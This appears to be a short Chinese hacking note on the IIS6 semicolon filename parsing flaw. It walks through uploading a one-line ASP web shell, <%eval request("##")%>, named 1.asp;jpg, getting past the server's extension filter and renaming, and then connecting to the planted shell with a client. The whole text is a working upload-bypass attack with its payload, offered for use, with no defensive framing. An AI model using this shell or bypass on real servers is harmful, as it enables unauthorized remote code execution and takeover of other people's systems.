iis6下的一个解析漏洞1.asp;2.jpg或1.asp;jpg
上传1.asp;2.jpg,出现Invalid file.无法上传
加gif89a绕过验证,结果也不行。
又后想到用一句话木马,<%eval request("##")%>保存为1.asp;2.jpg上传。
成功上传得到路径/userfiles/image/1_asp;2.jpg
发现1.asp又被替换成1_asp了。
把1.asp;2.jpg改为1.asp;jpg
成功得到路径/userfiles/image/1.asp;jpg
然后用一句话客户端连就可以咯.